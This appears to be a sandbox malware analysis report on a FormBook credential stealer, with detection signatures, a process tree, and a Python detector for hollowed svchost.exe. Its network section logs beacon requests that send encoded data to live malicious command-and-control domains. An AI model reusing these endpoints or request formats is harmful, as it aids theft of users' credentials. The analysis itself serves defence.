Windows Analysis Report
PO #2411071822.exe

Overview

General Information

Sample name: PO #2411071822.exe
Analysis ID: 1560695
MD5: 564780e97b7357ca98fc62db3df63809
SHA1: cf356f775304d3bb066be358353ff1cc96689fd2
SHA256: 14bc9f9cd6cfa43bf361789b26b16a95e6867c8bbd5bd78670b19da25bc729ef
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO #2411071822.exe (PID: 5008 cmdline: "C:\Users\user\Desktop\PO #2411071822.exe" MD5: 564780E97B7357CA98FC62DB3DF63809)
    • svchost.exe (PID: 6980 cmdline: "C:\Users\user\Desktop\PO #2411071822.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • olMdMEBIcgVB.exe (PID: 3752 cmdline: "C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • pcaui.exe (PID: 6468 cmdline: "C:\Windows\SysWOW64\pcaui.exe" MD5: A8F63C86DEF45A7E48E7F7DF158CFAA9)
          • olMdMEBIcgVB.exe (PID: 2128 cmdline: "C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2284 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(3 further memory-dump matches for the same rule are listed in full under AV Detection)

Source | Rule | Description | Author
2.2.svchost.exe.2470000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.2470000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ParentImage: C:\Users\user\Desktop\PO #2411071822.exe, ParentProcessId: 5008, ParentProcessName: PO #2411071822.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ProcessId: 6980, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ParentImage: C:\Users\user\Desktop\PO #2411071822.exe, ParentProcessId: 5008, ParentProcessName: PO #2411071822.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO #2411071822.exe", ProcessId: 6980, ProcessName: svchost.exe
No Suricata rule has matched
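The two Sigma matches above both fire on the same event: a SysWOW64 svchost.exe whose parent is the sample and whose command line is the parent's own command line, which is what a hollowed svchost.exe looks like in process-creation telemetry. As an added example that is not part of this report or of the Sigma rules it cites, the Python below re-implements that check over events shaped like the match data. The parent allow-list is an assumed baseline to be tuned per environment; the first event is modelled on the Sigma data above and the second is a constructed benign svchost start used as a control.

```python
from __future__ import annotations
import ntpath

# Assumed baseline of parents that legitimately start svchost.exe; tune per
# environment. Lower-case basenames are compared, so the list is case-insensitive.
LEGIT_SVCHOST_PARENTS = {
    "services.exe", "msmpeng.exe", "mrt.exe", "rundll32.exe", "ngen.exe", "ngentask.exe",
}
SVCHOST_PATHS = ("c:\\windows\\system32\\svchost.exe", "c:\\windows\\syswow64\\svchost.exe")

# Constructed events. The first copies the field values of the Sigma match in
# this report; the second is a benign svchost start for contrast.
SAMPLE_EVENTS = [
    {
        "ProcessId": 6980,
        "Image": r"C:\Windows\SysWOW64\svchost.exe",
        "CommandLine": r'"C:\Users\user\Desktop\PO #2411071822.exe"',
        "ParentProcessId": 5008,
        "ParentImage": r"C:\Users\user\Desktop\PO #2411071822.exe",
        "ParentCommandLine": r'"C:\Users\user\Desktop\PO #2411071822.exe"',
    },
    {
        "ProcessId": 1234,
        "Image": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",
        "ParentProcessId": 700,
        "ParentImage": r"C:\Windows\System32\services.exe",
        "ParentCommandLine": r"C:\Windows\system32\services.exe",
    },
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _unquote(cmdline: str) -> str:
    return cmdline.strip().strip('"').lower()


def classify(event: dict) -> list[str]:
    """Findings for one process-creation event; an empty list means nothing notable."""
    if event["Image"].lower() not in SVCHOST_PATHS:
        return []
    findings = []
    if _basename(event["ParentImage"]) not in LEGIT_SVCHOST_PARENTS:
        findings.append("uncommon_svchost_parent")
    cmd = _unquote(event["CommandLine"])
    # A hollowed svchost.exe keeps its creator's command line: the injector
    # starts svchost.exe suspended with its own command line and replaces the
    # mapped image afterwards. A genuine instance names svchost.exe itself.
    if not cmd.startswith(SVCHOST_PATHS):
        findings.append("commandline_image_mismatch")
    if cmd == _unquote(event["ParentCommandLine"]):
        findings.append("commandline_equals_parent")
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId to its findings for every event that produced at least one."""
    result = {}
    for ev in events:
        findings = classify(ev)
        if findings:
            result[ev["ProcessId"]] = findings
    return result


if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```

The command-line comparison is the part worth keeping even if the parent allow-list is noisy in a given estate: a legitimate svchost.exe never carries another binary's path as its command line, so that tell alone separates hollowing from an odd but benign parent.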


AV Detection

Source: http://www.acond-22-mvr.click/w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== | Avira URL Cloud: Label: malware
Source: http://www.acond-22-mvr.click/w9z4/ | Avira URL Cloud: Label: malware
Source: PO #2411071822.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 2.2.svchost.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3892074167.0000000005060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3893435430.0000000005420000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3891158073.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2152031771.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2151673772.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3892013013.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3891999951.0000000003140000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2152486099.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO #2411071822.exe | Joe Sandbox ML: detected
Source: PO #2411071822.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: pcaui.pdb | source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: olMdMEBIcgVB.exe, 00000003.00000000.2076602169.000000000017E000.00000002.00000001.01000000.00000004.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891157004.000000000017E000.00000002.00000001.01000000.00000004.sdmp (this PDB path identifies olMdMEBIcgVB.exe as the sandbox's own decoy Chrome build rather than a file dropped by the sample; the FormBook Yara hit in its memory, source 00000006 above, is code injected into that browser process, not a second payload)
Source: Binary string: wntdll.pdbUGP | source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: pcaui.pdbGCTL | source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00426CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00426CA9
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_004260DD
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_004263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_004263F9
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0042EB60
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042F56F FindFirstFileW,FindClose, 0_2_0042F56F
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0042F5FA
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00431B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431B2F
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00431C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431C8A
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00431F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00431F94

Networking

Source: DNS query: www.rtpterbaruwaktu3.xyz
Source: DNS query: www.54248711.xyz
Source: Joe Sandbox View | IP Address: 161.97.142.144
Source: Joe Sandbox View | ASN Name: CONTABODE
Source: Joe Sandbox View | ASN Name: LINKNET-ID-APLinknetASNID
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 occurrences)
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00434EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00434EB5
Source: global traffic | HTTP traffic detected: GET /7yx4/?jbeXk=EHbdQPuX&cla=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQaxXxx2OcYdqfi9qgQF3SHTlHdwLQ+7ODGDyF3UwRNLbgag== HTTP/1.1 | Host: www.rtpterbaruwaktu3.xyz | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /klhq/?cla=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ieDRvxIHzah5xLQe7b3R0zi9v/9+L2XqTgkk9lBsx9pauw==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.70kdd.top | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /w9z4/?jbeXk=EHbdQPuX&cla=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfbeeWLm23HuUFOBNObgSjIwBxlFn7Rit3IOIP+ZrZsKx+FQ== HTTP/1.1 | Host: www.acond-22-mvr.click | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /11t3/?cla=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013x4IWAXPzPql46H99XQd8N1WVXRvZaJo9RbMIS7VF6QhjMA==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.smartcongress.net | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /2pji/?cla=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT9yZ96oMLsgfQ1G9JdO2EtcszdOb7L0lpI3ZCf/THH8NE8w==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.mrpokrovskii.pro | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /egqi/?cla=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.ytsd88.top | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /hyyd/?jbeXk=EHbdQPuX&cla=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1 | Host: www.matteicapital.online | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /rsvy/?cla=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.llljjjiii.shop | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /huvt/?cla=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.ampsamkok88.shop | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | HTTP traffic detected: GET /6gtt/?cla=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbftG3TST47at8LnD6yWitNli0aOZiiyErkaGZ0ExcXW9KKA==&jbeXk=EHbdQPuX HTTP/1.1 | Host: www.gogawithme.live | Accept: */* | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
Source: global traffic | DNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
Source: global traffic | DNS traffic detected: DNS query: www.70kdd.top
Source: global traffic | DNS traffic detected: DNS query: www.acond-22-mvr.click
Source: global traffic | DNS traffic detected: DNS query: www.smartcongress.net
Source: global traffic | DNS traffic detected: DNS query: www.mrpokrovskii.pro
Source: global traffic | DNS traffic detected: DNS query: www.ytsd88.top
Source: global traffic | DNS traffic detected: DNS query: www.matteicapital.online
Source: global traffic | DNS traffic detected: DNS query: www.llljjjiii.shop
Source: global traffic | DNS traffic detected: DNS query: www.ampsamkok88.shop
Source: global traffic | DNS traffic detected: DNS query: www.gogawithme.live
Source: global traffic | DNS traffic detected: DNS query: www.54248711.xyz
Source: unknown | HTTP traffic detected: POST /klhq/ HTTP/1.1 | Host: www.70kdd.top | Accept: */* | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en;q=0.9 | Origin: http://www.70kdd.top | Cache-Control: max-age=0 | Content-Length: 204 | Connection: close | Content-Type: application/x-www-form-urlencoded | Referer: http://www.70kdd.top/klhq/ | User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS) | Data Ascii: cla=NFwfoXbecwawWZ0LriD9vflvEM6k1NDUc0jSQCQ1fdUVdmvM0p9F/44uED3wale0zTr9mz/mhAWpcs1uGPRmid3QkXxhlp4h04wU9KXK0Bae29sSAQbDDWAh81hf9ehV9o6s8FBAbsZizQ0KhdB81nteFmr9Bcw2cLFMzqS8b6EqgbqYhMq9rQJGeBrj40+xX3nj/Jg=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 796 | date: Fri, 22 Nov 2024 06:55:11 GMT | server: LiteSpeed | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "><div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Source: global traffic | HTTP traffic detected (three identical responses, Date: Fri, 22 Nov 2024 06:55:29 GMT, 06:55:32 GMT and 06:55:37 GMT): HTTP/1.1 404 Not Found | Server: nginx | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66e01838-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected (four identical responses, date: Fri, 22 Nov 2024 06:56:00 GMT, 06:56:03 GMT, 06:56:06 GMT and 06:56:08 GMT): HTTP/1.1 404 Not Found | content-type: text/html; charset=iso-8859-1 | content-length: 196 | server: LiteSpeed | x-tuned-by: N0C | connection: close | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 22 Nov 2024 06:56:16 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
